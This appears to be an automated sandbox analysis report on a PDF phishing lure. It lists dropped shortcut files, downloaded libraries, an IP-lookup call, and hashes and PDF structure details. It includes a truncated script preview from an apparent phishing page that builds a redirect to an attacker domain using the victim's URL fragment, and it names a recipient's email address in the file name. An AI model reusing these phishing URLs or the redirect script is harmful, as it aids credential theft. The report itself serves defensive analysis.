                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.999802264521079
                          Encrypted:false
                          SSDEEP:
                          MD5:56667C345C880BC2D254ECDFCC3A3994
                          SHA1:11189CC07FD4FE115D181F6D3C58E1C7E3605F48
                          SHA-256:225B09714B3EF939DB76F278B5AE2B9F240F547055D47B96915F890029982699
                          SHA-512:B44C8E5F987BF20A57C8C771F4110696E8C621C526C73C46F0647012FAB0A54FD23810A7EB7560BD73ABBB7622442406AFD885C9E6EC1102694A29807EC08D69
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....*.B..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.984574736595405
                          Encrypted:false
                          SSDEEP:
                          MD5:1737525D42A4A5198A0E8FA22194F81D
                          SHA1:87EF5C4D3557AD429B67EC8AD9EA4201FF3D52D7
                          SHA-256:A1588C4C92CC7C4824E5BE6A157F9ADBC02184829D47934F2B9D3AB739B2A5B2
                          SHA-512:CB7A17173C9767B97DE6F91369C00E4E4E212C45E47AACBF39B31E2F1AE6B535AFA02BB07978EFCC973E811B7BA14E8591E9D8522A3E311F5786835152C49E0A
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.99256294866054
                          Encrypted:false
                          SSDEEP:
                          MD5:99393E059D94E9A8A2FCA270D056F657
                          SHA1:CDEB123341185BB994AA4A7648A7E0D6FF1ADBE5
                          SHA-256:3AC22F39D634CED8B66614EC8BDFD39F82D7CC2C8C20A5B223BFD4BC996B68C2
                          SHA-512:72083A2B52ABA50CE9E68D422D19E0EF07C5A4F320E2FC091922186E5A12009EC0D0112F4CA68024E9386840C4C28A5DD79A0CE29E070795DF2EE02BB18319EB
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:downloaded
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (65353), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):104615
                          Entropy (8bit):5.962045330195449
                          Encrypted:false
                          SSDEEP:
                          MD5:9B08732027FE0EE456C99E480C307C02
                          SHA1:C0E39DA8C09E52F6271699DDD6613633E017F4B4
                          SHA-256:6B0EC1E20077D320E0D207F49359613ABE225677828F7D46F00A0D53B34BB214
                          SHA-512:7C4B329B053D92A99C42F02B3001DDDEEDC860922C25F4DF7CC274CF5F5D489561768096B75B33A9220E9FD0004E083FD50C032BF7D509CE62DB857B9004B611
                          Malicious:false
                          Reputation:unknown
                          URL:https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html
                          Preview:<script>....let ulink = "https://emailavailabilitysecure.info/doc74387//#".. let ai = `${ulink}${window.location.hash.substring(1)}`;.. let bi = "https://amazon.com/";....let imageUrl = 'data:image/jpeg;base64,
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JSON data
                          Category:downloaded
                          Size (bytes):23
                          Entropy (8bit):3.7950885863977324
                          Encrypted:false
                          SSDEEP:
                          MD5:F55FCB2CDD44B93560BC063DE404C76D
                          SHA1:7EB2CE140F2B9ED67D5AC33ED73AF2197CE569D9
                          SHA-256:57CFB4BEE90CB15A3611C9570EAEE41ADFED6F737DDB9CDE5542F47E5B421894
                          SHA-512:B29505113449BBFD096C5216605F0EC379AD8524AF9D5F9A80CE8F6A34A5D5542463D93339B4D7CA93B5F2C15CB7E7E82CF2A02D58B5355B956CE37502B398DF
                          Malicious:false
                          Reputation:unknown
                          URL:https://api.ipify.org/?format=json
                          Preview:{"ip":"173.254.250.68"}
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (47992), with no line terminators
                          Category:dropped
                          Size (bytes):47992
                          Entropy (8bit):5.605846858683577
                          Encrypted:false
                          SSDEEP:
                          MD5:CF3402D7483B127DED4069D651EA4A22
                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                          Malicious:false
                          Reputation:unknown
                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):40
                          Entropy (8bit):4.120950594454667
                          Encrypted:false
                          SSDEEP:
                          MD5:B09F000BFB98ABD880BC77E05456FFEA
                          SHA1:FBADFA7F41B709507692B8FCEA597474EED91E2C
                          SHA-256:0A721532497036FF7D8B228DD8D4EF5E91777B0BD2B11F49F5B2CCDDD55EB259
                          SHA-512:F2E0CF9FD6D14EAF9BE953052515A598E9F96186FB82D5FA8D3E9B01F9706284DE8DDDF343AB69CF566EDEB28C659D65E0D608F99A5717A7CBFB2CC48ADA15A7
                          Malicious:false
                          Reputation:unknown
                          Preview:{"detail":"Method \"GET\" not allowed."}
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (611)
                          Category:downloaded
                          Size (bytes):27150
                          Entropy (8bit):4.357340680151037
                          Encrypted:false
                          SSDEEP:
                          MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                          SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                          SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                          SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                          Malicious:false
                          Reputation:unknown
                          URL:https://pub-ded8309031d344399056bf442a8ef815.r2.dev/favicon.ico
                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):128
                          Entropy (8bit):5.13621121637073
                          Encrypted:false
                          SSDEEP:
                          MD5:90B2E18E709922EBE34926FCA6C736F6
                          SHA1:4C478C1F134CC54C82377BF5561B4CA4CC4F8E5F
                          SHA-256:218CC8157BB4D0D8A5853274A2F04E621F3A4FC01E21C180759503F9C1968392
                          SHA-512:D612B65DD23A402D564DF9BB4E8FD95E9B09EFCDC1C298F5E07343EC3A568A7464ED4C28B609A629BFE49E8DB78F48EEBEA0B1026F2F0BEB69649632ED3B32A0
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAk8jt6_q9BG5xIFDaXtx4USBQ0B_SbtEgUNepTjKxIFDZWvjf0SBQ2Vr439EiwJHyFyub6JvE4SBQ2l7ceFEgUNAf0m7RIFDXqU4ysSBQ2Vr439EgUNla-N_Q==?alt=proto
                          Preview:Ci0KBw2l7ceFGgAKBw0B/SbtGgAKBw16lOMrGgAKBw2Vr439GgAKBw2Vr439GgAKLQoHDaXtx4UaAAoHDQH9Ju0aAAoHDXqU4ysaAAoHDZWvjf0aAAoHDZWvjf0aAA==
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (48316), with no line terminators
                          Category:downloaded
                          Size (bytes):48316
                          Entropy (8bit):5.6346993394709
                          Encrypted:false
                          SSDEEP:
                          MD5:2CA03AD87885AB983541092B87ADB299
                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                          Malicious:false
                          Reputation:unknown
                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                          File type:PDF document, version 1.7, 0 pages
                          Entropy (8bit):7.910131794082582
                          TrID:
                          • Adobe Portable Document Format (5005/1) 100.00%
                          File name:scan3762399_arleen@wcctxlaw.com.pdf
                          File size:20'225 bytes
                          MD5:55291e9f9037ee53a9605772fa7a5cf7
                          SHA1:a0af9b6b729afdf26c31f9e3dffed68896d28ff2
                          SHA256:33b47fad1df53235b08cf678442a7ef0f87678a4f33212abafee24294fe1c490
                          SHA512:1cb5044957c057d0c660d87162810180fb26dd47aec8082b9a541d210127498ab426a48a70da36c4c5b5c49dc94c3f560c37f54f7adbfa362a7d6814819971df
                          SSDEEP:384:EgFcIANS9esuCjWTSvQcSE6oXgwR89QDwCBH7Q1FnV866vrxyxE7xd/o:PF5ANS9UCaTEQFElNR8EwCBbCG66jIee
                          TLSH:8992D077F50DEC64D883CA5522A437936C1CB7C3C9C838F4366BC555AAA808AF156A93
                          File Content Preview:%PDF-1.7.1 0 obj.<< /Type /Catalog./Outlines 2 0 R./Pages 3 0 R >>.endobj.2 0 obj.<< /Type /Outlines /Count 0 >>.endobj.3 0 obj.<< /Type /Pages./Kids [6 0 R.]./Count 1./Resources <<./ProcSet 4 0 R./Font << ./F1 8 0 R./F2 9 0 R.>>./XObject << ./I1 10 0 R./
                          Icon Hash:62cc8caeb29e8ae0

                          General

                          Header:%PDF-1.7
                          Total Entropy:7.910132
                          Total Bytes:20225
                          Stream Entropy:7.950593
                          Stream Bytes:18446
                          Entropy outside Streams:5.111962
                          Bytes outside Streams:1779
                          Number of EOF found:1
                          Bytes after EOF:
                          Name            Count
                          obj             11
                          endobj          11
                          stream          3
                          endstream       3
                          xref            1
                          trailer         1
                          startxref       1
                          /Page           1
                          /Encrypt        0
                          /ObjStm         0
                          /URI            0
                          /JS             0
                          /JavaScript     0
                          /AA             0
                          /OpenAction     0
                          /AcroForm       0
                          /JBIG2Decode    0
                          /RichMedia      0
                          /Launch         0
                          /EmbeddedFile   0

                          Image Streams

                          ID    DHASH               MD5                                 Preview
                          10    2a3995db69e9c2d6    12ff6a5e2d13275114a6d536875e1786
                          11    50e4d654722d3834    a46aa110534bec6b8db3ed46c4ac3a8e